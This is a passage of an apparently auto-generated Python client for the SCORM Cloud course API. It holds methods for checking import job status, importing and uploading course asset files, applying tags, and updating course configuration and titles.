'/courses', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CourseListSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_import_job_status(self, import_job_id, **kwargs): # noqa: E501
"""Get import job status for a Course # noqa: E501
Check the status of a course import. This can be called incrementally to check the progress of a call to any of the import options. >**Note:** >The import job ID used for calls to GetImportJobStatus are only valid for one week after the course import finishes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_import_job_status(import_job_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str import_job_id: Id received when the import job was submitted to the importJobs resource. (required)
:return: ImportJobResultSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_import_job_status_with_http_info(import_job_id, **kwargs) # noqa: E501
else:
(data) = self.get_import_job_status_with_http_info(import_job_id, **kwargs) # noqa: E501
return data
def get_import_job_status_with_http_info(self, import_job_id, **kwargs): # noqa: E501
"""Get import job status for a Course # noqa: E501
Check the status of a course import. This can be called incrementally to check the progress of a call to any of the import options. >**Note:** >The import job ID used for calls to GetImportJobStatus are only valid for one week after the course import finishes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_import_job_status_with_http_info(import_job_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str import_job_id: Id received when the import job was submitted to the importJobs resource. (required)
:return: ImportJobResultSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['import_job_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_import_job_status" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'import_job_id' is set
if ('import_job_id' not in params or
params['import_job_id'] is None):
raise ValueError("Missing the required parameter `import_job_id` when calling `get_import_job_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'import_job_id' in params:
path_params['importJobId'] = params['import_job_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/importJobs/{importJobId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ImportJobResultSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def import_course_asset_file(self, course_id, asset_schema, **kwargs): # noqa: E501
"""Import an asset file for a Course # noqa: E501
Creates or updates an asset file fetched from the provided url into the course. The file will be downloaded from the url and stored in SCORM Cloud. This is a useful way to modify the course structure without needing to reimport the whole course after you've made changes. >**Info:** >If the course structure is being heavily modified, consider creating a new version instead. This can be done by calling one of the course import jobs while passing true for `mayCreateNewVersion`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.import_course_asset_file(course_id, asset_schema, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param ImportAssetRequestSchema asset_schema: (required)
:param str update_asset_policy: Describes how SCORM Cloud should handle importing asset files with respect to overwriting files. Valid values are 'reject', 'strict', and 'lax'. A 'reject' policy request will fail if the asset file already exists on the system ('overwriting' not allowed). A 'strict' policy request will fail if the asset file does not already exist ('overwriting' is required). A 'lax' policy request will not consider whether the file already exists (i.e., it will attempt to import in all cases).
:return: AssetFileSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.import_course_asset_file_with_http_info(course_id, asset_schema, **kwargs) # noqa: E501
else:
(data) = self.import_course_asset_file_with_http_info(course_id, asset_schema, **kwargs) # noqa: E501
return data
def import_course_asset_file_with_http_info(self, course_id, asset_schema, **kwargs): # noqa: E501
"""Import an asset file for a Course # noqa: E501
Creates or updates an asset file fetched from the provided url into the course. The file will be downloaded from the url and stored in SCORM Cloud. This is a useful way to modify the course structure without needing to reimport the whole course after you've made changes. >**Info:** >If the course structure is being heavily modified, consider creating a new version instead. This can be done by calling one of the course import jobs while passing true for `mayCreateNewVersion`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.import_course_asset_file_with_http_info(course_id, asset_schema, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param ImportAssetRequestSchema asset_schema: (required)
:param str update_asset_policy: Describes how SCORM Cloud should handle importing asset files with respect to overwriting files. Valid values are 'reject', 'strict', and 'lax'. A 'reject' policy request will fail if the asset file already exists on the system ('overwriting' not allowed). A 'strict' policy request will fail if the asset file does not already exist ('overwriting' is required). A 'lax' policy request will not consider whether the file already exists (i.e., it will attempt to import in all cases).
:return: AssetFileSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'asset_schema', 'update_asset_policy'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method import_course_asset_file" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `import_course_asset_file`") # noqa: E501
# verify the required parameter 'asset_schema' is set
if ('asset_schema' not in params or
params['asset_schema'] is None):
raise ValueError("Missing the required parameter `asset_schema` when calling `import_course_asset_file`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
if 'update_asset_policy' in params:
query_params.append(('updateAssetPolicy', params['update_asset_policy'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'asset_schema' in params:
body_params = params['asset_schema']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/asset', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AssetFileSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def import_course_version_asset_file(self, course_id, version_id, asset_schema, **kwargs): # noqa: E501
"""Import an asset file for a Course Version # noqa: E501
Creates or updates an asset file fetched from the provided url into the course version. The file will be downloaded from the url and stored in SCORM Cloud. This is a useful way to modify the course structure without needing to reimport the whole course after you've made changes. >**Info:** >If the course structure is being heavily modified, consider creating a new version instead. This can be done by calling one of the course import jobs while passing true for `mayCreateNewVersion`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.import_course_version_asset_file(course_id, version_id, asset_schema, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param ImportAssetRequestSchema asset_schema: (required)
:param str update_asset_policy: Describes how SCORM Cloud should handle importing asset files with respect to overwriting files. Valid values are 'reject', 'strict', and 'lax'. A 'reject' policy request will fail if the asset file already exists on the system ('overwriting' not allowed). A 'strict' policy request will fail if the asset file does not already exist ('overwriting' is required). A 'lax' policy request will not consider whether the file already exists (i.e., it will attempt to import in all cases).
:return: AssetFileSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.import_course_version_asset_file_with_http_info(course_id, version_id, asset_schema, **kwargs) # noqa: E501
else:
(data) = self.import_course_version_asset_file_with_http_info(course_id, version_id, asset_schema, **kwargs) # noqa: E501
return data
def import_course_version_asset_file_with_http_info(self, course_id, version_id, asset_schema, **kwargs): # noqa: E501
"""Import an asset file for a Course Version # noqa: E501
Creates or updates an asset file fetched from the provided url into the course version. The file will be downloaded from the url and stored in SCORM Cloud. This is a useful way to modify the course structure without needing to reimport the whole course after you've made changes. >**Info:** >If the course structure is being heavily modified, consider creating a new version instead. This can be done by calling one of the course import jobs while passing true for `mayCreateNewVersion`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.import_course_version_asset_file_with_http_info(course_id, version_id, asset_schema, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param ImportAssetRequestSchema asset_schema: (required)
:param str update_asset_policy: Describes how SCORM Cloud should handle importing asset files with respect to overwriting files. Valid values are 'reject', 'strict', and 'lax'. A 'reject' policy request will fail if the asset file already exists on the system ('overwriting' not allowed). A 'strict' policy request will fail if the asset file does not already exist ('overwriting' is required). A 'lax' policy request will not consider whether the file already exists (i.e., it will attempt to import in all cases).
:return: AssetFileSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'version_id', 'asset_schema', 'update_asset_policy'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method import_course_version_asset_file" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `import_course_version_asset_file`") # noqa: E501
# verify the required parameter 'version_id' is set
if ('version_id' not in params or
params['version_id'] is None):
raise ValueError("Missing the required parameter `version_id` when calling `import_course_version_asset_file`") # noqa: E501
# verify the required parameter 'asset_schema' is set
if ('asset_schema' not in params or
params['asset_schema'] is None):
raise ValueError("Missing the required parameter `asset_schema` when calling `import_course_version_asset_file`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
if 'version_id' in params:
path_params['versionId'] = params['version_id'] # noqa: E501
query_params = []
if 'update_asset_policy' in params:
query_params.append(('updateAssetPolicy', params['update_asset_policy'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'asset_schema' in params:
body_params = params['asset_schema']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/versions/{versionId}/asset', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AssetFileSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def put_course_tags(self, course_id, tags, **kwargs): # noqa: E501
"""Add tags to a Course # noqa: E501
Applies the provided tags to the course. Tags are used to easily identify resources. Adding tags can enable more refined searches when making calls to certain endpoints (e.g. GetCourses). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_course_tags(course_id, tags, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param TagListSchema tags: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.put_course_tags_with_http_info(course_id, tags, **kwargs) # noqa: E501
else:
(data) = self.put_course_tags_with_http_info(course_id, tags, **kwargs) # noqa: E501
return data
def put_course_tags_with_http_info(self, course_id, tags, **kwargs): # noqa: E501
"""Add tags to a Course # noqa: E501
Applies the provided tags to the course. Tags are used to easily identify resources. Adding tags can enable more refined searches when making calls to certain endpoints (e.g. GetCourses). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_course_tags_with_http_info(course_id, tags, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param TagListSchema tags: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'tags'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method put_course_tags" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `put_course_tags`") # noqa: E501
# verify the required parameter 'tags' is set
if ('tags' not in params or
params['tags'] is None):
raise ValueError("Missing the required parameter `tags` when calling `put_course_tags`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'tags' in params:
body_params = params['tags']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/tags', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def put_course_tags_batch(self, batch, **kwargs): # noqa: E501
"""Add a group of tags to a group of Courses # noqa: E501
Applies all of the provided tags on all of the provided courses. Tags are used to easily identify resources. Adding tags can enable more refined searches when making calls to certain endpoints (e.g. GetCourses). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_course_tags_batch(batch, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BatchTagsSchema batch: Array of ids, and array of tags for bulk tag operations (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.put_course_tags_batch_with_http_info(batch, **kwargs) # noqa: E501
else:
(data) = self.put_course_tags_batch_with_http_info(batch, **kwargs) # noqa: E501
return data
def put_course_tags_batch_with_http_info(self, batch, **kwargs): # noqa: E501
"""Add a group of tags to a group of Courses # noqa: E501
Applies all of the provided tags on all of the provided courses. Tags are used to easily identify resources. Adding tags can enable more refined searches when making calls to certain endpoints (e.g. GetCourses). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_course_tags_batch_with_http_info(batch, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BatchTagsSchema batch: Array of ids, and array of tags for bulk tag operations (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['batch'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method put_course_tags_batch" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'batch' is set
if ('batch' not in params or
params['batch'] is None):
raise ValueError("Missing the required parameter `batch` when calling `put_course_tags_batch`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'batch' in params:
body_params = params['batch']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/tags', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def set_course_configuration(self, course_id, configuration_settings, **kwargs): # noqa: E501
"""Update configuration settings for a Course # noqa: E501
Updates configuration settings at the course level. This will explicitly set a value at the course level and override any settings from a higher level. These settings will affect all items within the course which do not have their own explicit configuration set. This can effectively be used to set course level defaults. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_course_configuration(course_id, configuration_settings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param SettingsPostSchema configuration_settings: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.set_course_configuration_with_http_info(course_id, configuration_settings, **kwargs) # noqa: E501
else:
(data) = self.set_course_configuration_with_http_info(course_id, configuration_settings, **kwargs) # noqa: E501
return data
def set_course_configuration_with_http_info(self, course_id, configuration_settings, **kwargs): # noqa: E501
"""Update configuration settings for a Course # noqa: E501
Updates configuration settings at the course level. This will explicitly set a value at the course level and override any settings from a higher level. These settings will affect all items within the course which do not have their own explicit configuration set. This can effectively be used to set course level defaults. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_course_configuration_with_http_info(course_id, configuration_settings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param SettingsPostSchema configuration_settings: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'configuration_settings'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_course_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `set_course_configuration`") # noqa: E501
# verify the required parameter 'configuration_settings' is set
if ('configuration_settings' not in params or
params['configuration_settings'] is None):
raise ValueError("Missing the required parameter `configuration_settings` when calling `set_course_configuration`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'configuration_settings' in params:
body_params = params['configuration_settings']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/configuration', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def set_course_title(self, course_id, title, **kwargs): # noqa: E501
"""Update title for a Course # noqa: E501
Updates the title of the course. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_course_title(course_id, title, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param TitleSchema title: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.set_course_title_with_http_info(course_id, title, **kwargs) # noqa: E501
else:
(data) = self.set_course_title_with_http_info(course_id, title, **kwargs) # noqa: E501
return data
def set_course_title_with_http_info(self, course_id, title, **kwargs): # noqa: E501
"""Update title for a Course # noqa: E501
Updates the title of the course. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_course_title_with_http_info(course_id, title, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param TitleSchema title: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'title'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_course_title" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `set_course_title`") # noqa: E501
# verify the required parameter 'title' is set
if ('title' not in params or
params['title'] is None):
raise ValueError("Missing the required parameter `title` when calling `set_course_title`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'title' in params:
body_params = params['title']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/title', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def set_course_version_configuration(self, course_id, version_id, configuration_settings, **kwargs): # noqa: E501
"""Update configuration settings for a Course Version # noqa: E501
Updates configuration settings at the course level. This will explicitly set a value at the course level and override any settings from a higher level. These settings will affect all items within the course which do not have their own explicit configuration set. This can effectively be used to set course level defaults. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_course_version_configuration(course_id, version_id, configuration_settings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param SettingsPostSchema configuration_settings: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.set_course_version_configuration_with_http_info(course_id, version_id, configuration_settings, **kwargs) # noqa: E501
else:
(data) = self.set_course_version_configuration_with_http_info(course_id, version_id, configuration_settings, **kwargs) # noqa: E501
return data
def set_course_version_configuration_with_http_info(self, course_id, version_id, configuration_settings, **kwargs): # noqa: E501
"""Update configuration settings for a Course Version # noqa: E501
Updates configuration settings at the course level. This will explicitly set a value at the course level and override any settings from a higher level. These settings will affect all items within the course which do not have their own explicit configuration set. This can effectively be used to set course level defaults. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_course_version_configuration_with_http_info(course_id, version_id, configuration_settings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param SettingsPostSchema configuration_settings: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'version_id', 'configuration_settings'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_course_version_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `set_course_version_configuration`") # noqa: E501
# verify the required parameter 'version_id' is set
if ('version_id' not in params or
params['version_id'] is None):
raise ValueError("Missing the required parameter `version_id` when calling `set_course_version_configuration`") # noqa: E501
# verify the required parameter 'configuration_settings' is set
if ('configuration_settings' not in params or
params['configuration_settings'] is None):
raise ValueError("Missing the required parameter `configuration_settings` when calling `set_course_version_configuration`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
if 'version_id' in params:
path_params['versionId'] = params['version_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'configuration_settings' in params:
body_params = params['configuration_settings']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/versions/{versionId}/configuration', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def upload_course_asset_file(self, course_id, destination, **kwargs): # noqa: E501
"""Upload an asset file for a Course # noqa: E501
Creates or updates an asset file uploaded from your file system into the course. The file will be sent as part of the request and will be stored in SCORM Cloud alongside the course. This is a useful way to modify the course structure without needing to reimport the whole course after you've made changes. >**Info:** >If the course structure is being heavily modified, consider creating a new version instead. This can be done by calling one of the course import jobs while passing true for `mayCreateNewVersion`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.upload_course_asset_file(course_id, destination, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param str destination: Relative path from the course's base directory where the asset file will be uploaded. `/Etiquette/Course.html` will upload the file into the Etiquette folder of the course. (required)
:param file file: The asset file to import into the course.
:param str update_asset_policy: Describes how SCORM Cloud should handle importing asset files with respect to overwriting files. Valid values are 'reject', 'strict', and 'lax'. A 'reject' policy request will fail if the asset file already exists on the system ('overwriting' not allowed). A 'strict' policy request will fail if the asset file does not already exist ('overwriting' is required). A 'lax' policy request will not consider whether the file already exists (i.e., it will attempt to import in all cases).
:return: AssetFileSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.upload_course_asset_file_with_http_info(course_id, destination, **kwargs) # noqa: E501
else:
(data) = self.upload_course_asset_file_with_http_info(course_id, destination, **kwargs) # noqa: E501
return data
def upload_course_asset_file_with_http_info(self, course_id, destination, **kwargs): # noqa: E501
"""Upload an asset file for a Course # noqa: E501
Creates or updates an asset file uploaded from your file system into the course. The file will be sent as part of the request and will be stored in SCORM Cloud alongside the course. This is a useful way to modify the course structure without needing to reimport the whole course after you've made changes. >**Info:** >If the course structure is being heavily modified, consider creating a new version instead. This can be done by calling one of the course import jobs while passing true for `mayCreateNewVersion`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.upload_course_asset_file_with_http_info(course_id, destination, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param str destination: Relative path from the course's base directory where the asset file will be uploaded. `/Etiquette/Course.html` will upload the file into the Etiquette folder of the course. (required)
:param file file: The asset file to import into the course.
:param str update_asset_policy: Describes how SCORM Cloud should handle importing asset files with respect to overwriting files. Valid values are 'reject', 'strict', and 'lax'. A 'reject' policy request will fail if the asset file already exists on the system ('overwriting' not allowed). A 'strict' policy request will fail if the asset file does not already exist ('overwriting' is required). A 'lax' policy request will not consider whether the file already exists (i.e., it will attempt to import in all cases).
:return: AssetFileSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'destination', 'file', 'update_asset_policy'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method upload_course_asset_file" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `upload_course_asset_file`") # noqa: E501
# verify the required parameter 'destination' is set
if ('destination' not in params or
params['destination'] is None):
raise ValueError("Missing the required parameter `destination` when calling `upload_course_asset_file`") # noqa: E501
collection_formats = {}
path_params = {}
